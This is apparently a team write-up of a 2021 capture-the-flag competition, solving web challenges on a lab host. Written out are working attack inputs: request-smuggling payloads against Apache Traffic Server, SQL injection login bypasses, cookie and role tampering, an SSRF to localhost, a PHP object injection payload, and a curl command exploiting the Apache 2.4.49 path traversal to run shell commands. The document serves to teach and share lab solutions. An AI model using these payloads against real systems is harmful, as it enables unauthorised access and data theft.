MetaSploit 2021

2 of spades

Solved by: Taz34

Did a NIKTO scan on the target

nikto -h http://172.17.15.117:443/

and one of the lines in the result showed this :

+ /.env: .env file found. The .env file may contain credentials.

so i headed to this sub directory

inserted the file name in the URL

http://172.17.15.117:443/3e6f0e21-7faa-429f-8a1d-3f715a520da4.png

and we have the flag.

3 of hearts

Solved too late by : Starry-lord

Port 33337

I solved this one after the competition but still felt compelled to share the process.

This one gave me a hard time, firstly because I hadn’t seen HTTP request smuggling scenarios before.

Trying to connect to the target IP:33337 redirects to a domain name

threeofhearts.ctf.net

And displays an empty page with only the following content:

<script>console.log(zp2)</script>

Some snooping showed me the initial request was made to an Apache traffic server 7.1.1 and the second one to an Nginx server 1.15.5. After a few research I realized there wasn’t much resource on the subject, but here’s what I found :

  • PortSwigger Web academy
  • https://medium.com/@knownsec404team/protocol-layer-attack-http-request-smuggling-cc654535b6f
  • https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/

Sadly no time for going through academy through the ctf but will definitely look into it in a nearby future.

I used 2 ways to try and see what was going on :

Way n°1 - CLI

printf 'GET_/somthingthatdoesntexist_HTTP/1.1\r\n'\
'Host:threeofhearts.ctf.net\r\n'\
'X:_"%65534s"\r\n'\
'GET_http://threeofhearts.ctf.net/_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 172.17.15.117 33337

So here we manage to get double request by adding 65534 empty spaces between 2 get requests.

First one results in a 400 error and second request goes through and shows the content of the internal website.

┌──(kali㉿kali)-[~/.starlord]
└─$ printf 'GET_/somethingNotThere_HTTP/1.1\r\n'\
'Host:threeofhearts.ctf.net\r\n'\
'X:_"%65534s"\r\n'\
'GET_http://threeofhearts.ctf.net/out/save.txt_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 172.17.15.117 33337
HTTP/1.1 400 Invalid HTTP Request
Date: Sun, 05 Dec 2021 23:34:29 GMT
Connection: keep-alive
Server: ATS/7.1.1
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 220

<HTML>
<HEAD>
<TITLE>Bad Request</TITLE>
</HEAD>

<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Bad Request</H1>
<HR>

<FONT FACE="Helvetica,Arial"><B>
Description: Could not process this request. 
</B></FONT>
<HR>
</BODY>
HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Sun, 05 Dec 2021 23:34:29 GMT
Content-Type: text/plain
Content-Length: 151
Last-Modified: Sun, 05 Dec 2021 23:08:15 GMT
ETag: "61ad465f-97"
X-Requested: /out/save.txt
Accept-Ranges: bytes
Age: 0
Connection: keep-alive

Params:
Headers:
        X-Access: 
        Cookie: 

Params:
        cache=0
Headers:
        X-Access: 
        Cookie: 

Params:
        var1=star
        var2=lord
Headers:
        X-Access: 
        Cookie: 

                                                                                
┌──(kali㉿kali)-[~/.starlord]
└─$ 

WAY n°2 - BurpSuite

It also worked with just a 0 in between GET requests and would be easier to input to burpsuite.

The website’s content would only show itself in a browser if the request was intercepted and its “Host” header manually set to threeofhearts.ctf.net

From there I found a small page with a PHP form for var1 and var2. By pressing submit, a GET request would be sent to /save.php and populate an entry in the above queried file (/out/save.txt).

There was a /private.php we were denied access to, where the flag was clearly hidden. This is the point where I had most trouble trouble realizing what was going on.

I knew we had to craft or find the right cookie to access the private.php but didn’t understand the fundamental of the HTTP request smuggling attack.

Turns out when you manage to split the request successfully, the second one will be sent from the server, which means admin headers in /out/save.txt in this case.

This was the burp request :

GET / HTTP/1.1
Host: threeofhearts.ctf
Transfer-Encoding: chunked
Content-Length:53

0

GET /save.php?var1=something&var2=something HTTP/1.1

Then making a request to /out/save.txt showed the following :

Headers:
  X-Access: private
  Cookie: PHPSESSID=theAdminPhpSessionId
  
Params:
  var1=something
  var2=something
Headers:
  X-Access:
  Cookie:

visiting /private.php with those header gave the un-guessable page link for the flag.

4 of diamonds

Solved by: Starry-Lord

Port 10010

Here we had a web app with a register and login page.

Registering gave access to the website and showed that the user details were stored in a javascript variable in the response.

<script>
  var current_account = {
    "id":2,"username":starlord,"role":"user","created_at":
    "2021-12-03T6:36:42.821Z","updated_at":"2021-12-03T6:36:42.821Z"
  };
</script>

By intercepting the register request, I noticed I was sending account[username]=starlord like parameters, and decided to add account[role]=admin to see if it would give me admin privilege.

By doing so I got a session with an additional admin button, which gave me the flag.

4 of hearts

Solved by: everyone

Port 80

Free Flag for the ones who managed to set their socks properly and access challenges.

5 of diamonds

Solved by: Starry-Lord, Thewhiteh4t, Bobbysox

Port 11111

This was an SQL Injection vulnerability. We had many problems for this one in terms of stability, in fact only one could attack it with sqlmap at the time.

We managed to get the password out from the database, which was a very long alpha-numeric string, bigger than max amount of chars accepted by the input field on the login page.

Passing the password with burp solved the problem and displayed a link to flag.png

Afterthought

We could bypass login through the username field with

username=X'or 1=1 --
password=notThePassword

but i missed that we could also simply bypass authentication with the password field:

username=admin
password='or 1=1 --

9 of diamonds

Solved By : thewhiteh4t

Port : 8080

In this challenge we were presented with a website about cookies, obvious hint. There were 3 sections :

  • User Registration
  • User Login
  • Admin Login

First I registered a user account and checked the cookies, there were 4 cookies for our user :

  • admin : false
  • authenticated-user : true
  • made-an-account : true
  • visited-main-page : true

I just had to modify admin from false to true and send the request and we got the flag.

10 of clubs

Solved by: Starry-Lord

port 12380

This port was using Apache httpd 2.4.49 and I found a good research on the subject here:

https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013

I didn’t need to get a shell. ls and cat commands were enough to extract the png:

curl -vv 'http://172.17.15.117:12380/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo; cat ../secret/safe/flag.png|base64'

ace of hearts

Solved by: Starry-Lord

Port 20011

We had a image gallery here with 4 user galleries.

Sarah’s gallery John’s gallery Ripley’s gallery Ash’s gallery

John’s gallery was not accessible, set to private.

When querying any other gallery, we could see the URL changing like so:

http://172.17.15.117:20011/gallery?galleryUrl=/admin

I tried to call the admin gallery through local-host and got access to the admin panel, where I just had to untick a box for making John’s gallery public.

http://172.17.15.117:20011/gallery?galleryUrl=http://127.0.0.1:20011/admin

He had this flag inside:

Yay an Ace!!! — Starry-Lord

jack of hearts

Solved By : thewhiteh4t

Port : 20022
  • User cookie is double base64 encoded, so we double decoded and ended up with the following :
O:4:"user":3:{
    s:8:"username";s:4:"user";
    s:5:"admin";b:0;
    s:11:"profile_img";s:23:"/var/www/html/guest.png";
}
O   -> Object
O:4 -> Object of length 4
:3: -> Object has 3 attributes
s   -> String data type
s:8 -> String of length 8
b   -> Boolean data type
b:0 -> False
  • This was a PHP Object Injection challenge
  • The goal of this challenge was not to become admin and if we try then the server sends hints or funny responses
  • Directly accessing the flag did not work so we can simply use ../
  • Final payload :
O:4:"user":3:{
    s:8:"username";s:4:"user";
    s:5:"admin";b:0;
    s:11:"profile_img";s:40:"/var/www/html/../../../../../../flag.png";
}